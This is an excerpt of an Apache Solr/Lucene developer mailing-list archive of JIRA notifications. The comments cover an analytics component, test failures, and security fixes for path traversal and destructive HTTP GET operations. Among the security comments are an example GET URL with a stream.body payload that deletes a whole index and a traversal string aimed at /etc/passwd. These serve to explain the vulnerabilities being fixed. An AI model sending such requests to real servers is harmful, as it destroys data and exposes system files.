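import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import org.apache.lucene.search.suggest.Lookup.LookupResult;

List<LookupResult> blend(List<LookupResult> top100, int n) {
  List<LookupResult> out = new ArrayList<LookupResult>();
  for (LookupResult r : top100) {
    int pos = positionOfFirstMatch(r);             // hypothetical positional lookup
    long blended = (long) (r.value / (1.0 + pos)); // earlier match => higher weight
    out.add(new LookupResult(r.key, blended));
  }
  Collections.sort(out, new Comparator<LookupResult>() {
    public int compare(LookupResult a, LookupResult b) {
      return Long.compare(b.value, a.value);       // descending by blended weight
    }
  });
  return out.subList(0, Math.min(n, out.size()));
}
{code}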



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5302) Analytics Component

2013-12-02 Thread Erick Erickson (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5302?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836570#comment-13836570
 ] 

Erick Erickson commented on SOLR-5302:
--

I have a time constraint here. See the comments on SOLR-5488. The short form is I 
have to be done with this no later than tomorrow (Tuesday) night. I've outlined 
several options at SOLR-5488; let me know what people think the best thing to 
do is. Please comment on SOLR-5488.


> Analytics Component
> ---
>
> Key: SOLR-5302
> URL: https://issues.apache.org/jira/browse/SOLR-5302
> Project: Solr
>  Issue Type: New Feature
>Reporter: Steven Bower
>Assignee: Erick Erickson
> Attachments: SOLR-5302.patch, SOLR-5302.patch, SOLR-5302.patch, 
> SOLR-5302.patch, Search Analytics Component.pdf, Statistical Expressions.pdf, 
> solr_analytics-2013.10.04-2.patch
>
>
> This ticket is to track a "replacement" for the StatsComponent. The 
> AnalyticsComponent supports the following features:
> * All functionality of StatsComponent (SOLR-4499)
> * Field Faceting (SOLR-3435)
> ** Support for limit
> ** Sorting (bucket name or any stat in the bucket)
> ** Support for offset
> * Range Faceting
> ** Supports all options of standard range faceting
> * Query Faceting (SOLR-2925)
> * Ability to use overall/field facet statistics as input to range/query 
> faceting (i.e. calc min/max date and then facet over that range)
> * Support for more complex aggregate/mapping operations (SOLR-1622)
> ** Aggregations: min, max, sum, sum-of-square, count, missing, stddev, mean, 
> median, percentiles
> ** Operations: negation, abs, add, multiply, divide, power, log, date math, 
> string reversal, string concat
> ** Easily pluggable framework to add additional operations
> * New / cleaner output format
> Outstanding Issues:
> * Multi-value field support for stats (supported for faceting)
> * Multi-shard support (may not be possible for some operations, eg median)



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Steven Bower (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836560#comment-13836560
 ] 

Steven Bower commented on SOLR-5488:


That link to Jenkins doesn't work for me... do you have another link, or a list 
of the tests that failed?

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Erick Erickson (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836566#comment-13836566
 ] 

Erick Erickson commented on SOLR-5488:
--

I can do one of several things:
1> Put the fix for the remaining test issue in tomorrow (Tuesday) night and 
merge into 4x. Someone needs to supply it :) [~sbower] [~houstonputman] what do 
you think?
or
2> just merge the current code into 4x and have someone apply the fix in both 
places.
or
3> pass it off to someone else for the foreseeable future.
or
4> just skip it for 4x and call it a 5x feature.

The current state is that this is in trunk, but not 4x, and it's failing tests 
occasionally. But otherwise things seem fine.

Let me know what people think. This is a significant new feature; I don't want 
it to languish.


Here's a list of the merges. I've been trying to keep up with them; I have a 
local copy with all of them applied, and precommit and tests all succeed. I had 
to do some minor reconciliations along the way.

svn merge -c 1543651 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545009 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545053 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545054 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545080 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545143 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545417 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545514 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545650 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1546074 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1546263 https://svn.apache.org/repos/asf/lucene/dev/trunk



> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Stefan Matheis (steffkes) (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836552#comment-13836552
 ] 

Stefan Matheis (steffkes) commented on SOLR-5518:
-

I'm not sure there's a need to remove the "Files" page completely, since 
browsing the available files would still be possible w/o the write stuff anyway? 
Maybe just remove the "modify" functionality but leave the rest "as is"?

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way SOLR-5287 
> does is a security vulnerability and that disabling it should be the norm. 
> Subsequent discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1698) load balanced distributed search

2013-12-02 Thread JIRA

[ 
https://issues.apache.org/jira/browse/SOLR-1698?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836545#comment-13836545
 ] 

Jan Høydahl commented on SOLR-1698:
---

I think this issue could be closed?

> load balanced distributed search
> 
>
> Key: SOLR-1698
> URL: https://issues.apache.org/jira/browse/SOLR-1698
> Project: Solr
>  Issue Type: Improvement
>Reporter: Yonik Seeley
> Attachments: SOLR-1698.patch, SOLR-1698.patch, SOLR-1698.patch, 
> SOLR-1698.patch, SOLR-1698.patch
>
>
> Provide syntax and implementation of load-balancing across shard replicas.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-4882) Restrict SolrResourceLoader to only classloader accessible files and instance dir

2013-12-02 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-4882?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-4882:


Labels: security  (was: )

> Restrict SolrResourceLoader to only classloader accessible files and instance 
> dir
> -
>
> Key: SOLR-4882
> URL: https://issues.apache.org/jira/browse/SOLR-4882
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 4.3
>Reporter: Uwe Schindler
>Assignee: Uwe Schindler
>  Labels: security
> Fix For: 4.6, 5.0
>
> Attachments: SOLR-4882.patch, SOLR-4882.patch, SOLR-4882.patch
>
>
> SolrResourceLoader currently allows loading files from any 
> absolute/CWD-relative path, which is used as a fallback if the resource 
> cannot be looked up via the class loader.
> We should limit this fallback to sub-dirs below the instanceDir passed into 
> the ctor. The CWD special case should be removed, too (the virtual CWD is 
> the instance's config or root dir).
> The reason for this is security related. Some Solr components allow passing 
> in resource paths via REST parameters (e.g. XSL stylesheets, velocity 
> templates, ...) and loading them via the resource loader. Restricting the 
> loader makes it possible to not allow loading e.g. /etc/passwd as a 
> stylesheet.
> In 4.4 we should add a solrconfig.xml setting that re-enables the old 
> behaviour, but it should be disabled by default; use it if your existing 
> installation requires files from outside the instance dir that are not 
> available via the URLClassLoader used internally. In Lucene 5.0 we should not 
> support this anymore.
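
A minimal sketch of the containment check such a restriction boils down to (an 
illustration, not the actual patch):

{code:java}
import java.io.File;
import java.io.IOException;

// Resolve the requested resource against the instance dir and reject anything
// that escapes it, e.g. "../../../etc/passwd".
static boolean isUnderInstanceDir(File instanceDir, String resource) throws IOException {
  String base = instanceDir.getCanonicalPath() + File.separator;
  String target = new File(instanceDir, resource).getCanonicalPath();
  return target.startsWith(base);
}
{code}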



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-5520) Backport some security fixes from 4.x to 3.6.x branch

2013-12-02 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5520?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-5520:


Labels: security  (was: )

> Backport some security fixes from 4.x to 3.6.x branch
> -
>
> Key: SOLR-5520
> URL: https://issues.apache.org/jira/browse/SOLR-5520
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 3.6.2
>Reporter: Uwe Schindler
>Assignee: Uwe Schindler
>  Labels: security
> Fix For: 3.6.3
>
> Attachments: SOLR-4481-3895-36.patch, SOLR-4882-36.patch
>
>
> Redhat wants to backport some security fixes we applied in 4.1 and 4.6 to the 
> Solr tree to 3.6, because their user-base still uses this version. To help 
> them with backporting across the major API/version changes, we should also do 
> this on the 3.6 branch.
> Redhat already assigned 3 CVE numbers to these issues and takes the older 
> issues seriously; they will patch older versions and also force users to 
> upgrade. cf. 
> [CVE-2013-6397|https://access.redhat.com/security/cve/CVE-2013-6397] 
> (SOLR-4882), 
> [CVE-2013-6407|https://access.redhat.com/security/cve/CVE-2013-6407] 
> (SOLR-3895), 
> [CVE-2013-6408|https://access.redhat.com/security/cve/CVE-2013-6408] 
> (SOLR-4881).
> To fully fix, we might need to backport more patches. I will take care of 
> this. This issue may be useful, if we release a 3.6.3 package.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Comment Edited] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836519#comment-13836519
 ] 

Uwe Schindler edited comment on SOLR-1523 at 12/2/13 2:12 PM:
--

This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml requestParsers parameter 
enableRemoteStreaming="true" which should perhaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming: a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday: 
[https://issues.apache.org/jira/browse/SOLR-5287?focusedCommentId=13836061&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-13836061]


was (Author: thetaphi):
This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml requestParsers parameter 
enableRemoteStreaming="true" which should perhaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming: a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday.

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Comment Edited] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836519#comment-13836519
 ] 

Uwe Schindler edited comment on SOLR-1523 at 12/2/13 2:13 PM:
--

This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml requestParsers parameter 
enableRemoteStreaming="true" which should perhaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming: a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday: [SOLR-5287 
PoC|https://issues.apache.org/jira/browse/SOLR-5287?focusedCommentId=13836061&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-13836061]


was (Author: thetaphi):
This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml requestParsers parameter 
enableRemoteStreaming="true" which should perhaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming: a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday: 
[https://issues.apache.org/jira/browse/SOLR-5287?focusedCommentId=13836061&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-13836061]

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Resolved] (LUCENE-2176) Pass Lucli the index to use as a command line argument

2013-12-02 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/LUCENE-2176?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jan Høydahl resolved LUCENE-2176.
-

Resolution: Won't Fix

I'm pretty sure that Lucli is not part of Lucene anymore; I could not find it 
anywhere. Closing!

> Pass Lucli the index to use as a command line argument
> --
>
> Key: LUCENE-2176
> URL: https://issues.apache.org/jira/browse/LUCENE-2176
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/other
>Reporter: Carlo Cabanilla
>Priority: Minor
> Attachments: lucli_index_as_arg.patch
>
>
> I made a patch to let you tell Lucli which index to use by passing it in as a 
> command line argument. I made the change off of the 3.0 branch; I wasn't sure 
> where the best place to do it was.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Resolved] (SOLR-412) XsltWriter does not output UTF-8 by default

2013-12-02 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/SOLR-412?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jan Høydahl resolved SOLR-412.
--

Resolution: Duplicate

I believe this is fixed in 3.1 by SOLR-2391. I have looked at the code but have 
not verified by testing. Please re-open if anyone still thinks there is work 
left on this.

> XsltWriter does not output UTF-8 by default
> ---
>
> Key: SOLR-412
> URL: https://issues.apache.org/jira/browse/SOLR-412
> Project: Solr
>  Issue Type: Bug
>  Components: Response Writers
>Affects Versions: 1.2
> Environment: Tomcat 5.5
> Linux Red Hat ES4  (2.6.9-5.ELsmp from 'uname -a')
>Reporter: Lance Norskog
> Attachments: diff-2009-10-22
>
>
> XsltWriter outputs XML text in ISO-8859-1 encoding by default.
> Tomcat 5.5 has URIEncoding="UTF-8" set in the <Connector> element as 
> described in the Wiki.
> This output description in the XML: 
> 
> gives output with this header:
> HTTP/1.1 200 OK
> Server: Apache-Coyote/1.1
> Content-Type: text/xml;charset=ISO-8859-1
> Transfer-Encoding: chunked
> Date: Wed, 14 Nov 2007 17:49:11 GMT
> I had to change the  directive to this:
>  
> This is the root cause of SOLR-233.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836521#comment-13836521
 ] 

Uwe Schindler commented on SOLR-5518:
-

Please do (2) as suggested in the other issue.

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way SOLR-5287 
> does is a security vulnerability and that disabling it should be the norm. 
> Subsequent discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836519#comment-13836519
 ] 

Uwe Schindler commented on SOLR-1523:
-

This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml requestParsers parameter 
enableRemoteStreaming="true" which should perhaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming: a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday.
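
To make the risk concrete, the classic demonstration is a delete-everything 
request issued as a plain GET (host and port illustrative):

{noformat}
http://localhost:8983/solr/update?stream.body=<delete><query>*:*</query></delete>&commit=true
{noformat}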

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Erick Erickson (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836517#comment-13836517
 ] 

Erick Erickson commented on SOLR-5518:
--

I need a plan Real Soon Now. Like in the next 8 hours.

I see several options:
1> go ahead and check this in to both trunk and 4x. 
2> just check it in to trunk and remove the whole thing from 4x entirely. 
Perhaps this will be a 5x only feature?
3> take it out of both.
4> other suggestions?

NOTE: if a subsequent decision is to pull things out, this will be quite simple 
on the server side: just remove the (new) EditFileRequestHandler class and then 
get tests to run. There'll be a test class that just gets removed, and there'll 
be a bit of code to remove in an existing test (ZK, TestModifyConfFiles). I 
think I put all the static methods in ShowFileRequestHandler, so that should be 
coherent. Finally, there'll be several solrconfig files to pull the comments 
out of. But a grep for EditFileRequestHandler should suffice to find them all.

[~steffkes] If we remove this either from 4x or trunk or both, how much work 
will it be to remove the "files" stuff in the UI? Would it be sufficient to 
just comment out the code at the top level that shows the files option?

I think it'll be far easier to just jerk the code out than to roll back the 
commits; any objections to doing <2> or <3> that way?

In the absence of any consensus, I'll do <2> this evening. I'll probably 
actually merge this code into 4x, _then_ remove it on a subsequent ticket, so 
don't be surprised if you see this get checked in to the 4x branch temporarily.

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way SOLR-5287 
> does is a security vulnerability and that disabling it should be the norm. 
> Subsequent discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread JIRA

[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836512#comment-13836512
 ] 

Jan Høydahl commented on SOLR-1523:
---

Agree. But this issue feels a bit too broad, talking about request handlers in 
general. Our admin API technology of choice seems to be Restlet.

Perhaps create new concrete sub-JIRAs: one for a new Core admin REST API, one 
for a Collections REST API, and one for enableRemoteStreaming. Are there other 
admin APIs to consider?

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread Noble Paul (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836506#comment-13836506
 ] 

Noble Paul commented on SOLR-1523:
--

I still believe we should just fix this. It is very easy to screw up stuff 
over HTTP GET.
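
For concreteness, a minimal sketch of the per-verb gate the description asks 
for (the names are illustrative, not an existing Solr API):

{code:java}
import java.io.IOException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Hypothetical mix-in: each handler declares which HTTP verbs it will service.
interface HttpMethodAware {
  boolean acceptsMethod(String httpMethod); // e.g. false for "GET" on destructive ops
}

// In the dispatch filter, before the handler is invoked:
void checkMethod(Object handler, HttpServletRequest req, HttpServletResponse rsp)
    throws IOException {
  if (handler instanceof HttpMethodAware
      && !((HttpMethodAware) handler).acceptsMethod(req.getMethod())) {
    rsp.sendError(405, "Method Not Allowed");
  }
}
{code}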

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jan Høydahl updated SOLR-1523:
--

Labels: security  (was: )

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread JIRA

[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836500#comment-13836500
 ] 

Jan Høydahl commented on SOLR-1523:
---

I'm tempted to close this as Won't Fix, as it seems people are in general happy 
with the APIs.

However, since we got the new Schema REST API, we have actually started doing 
admin stuff with proper REST. I like that. The question is whether there is 
anything to gain by re-writing the Cores API and the Collections API to use 
Restlet as well, getting away from the {{action=CREATE}} kind of syntax and 
instead doing it with POST/PUT. Perhaps for 5.0?

Another dangerous default is the solrconfig.xml {{requestParsers}} parameter 
{{enableRemoteStreaming="true"}}, which should perhaps default to {{false}} 
from 4.7 or 5.0. It allows anyone to delete everything with a single GET...

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Resolved] (SOLR-5520) Backport some security fixes from 4.x to 3.6.x branch

2013-12-02 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5520?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler resolved SOLR-5520.
-

Resolution: Fixed

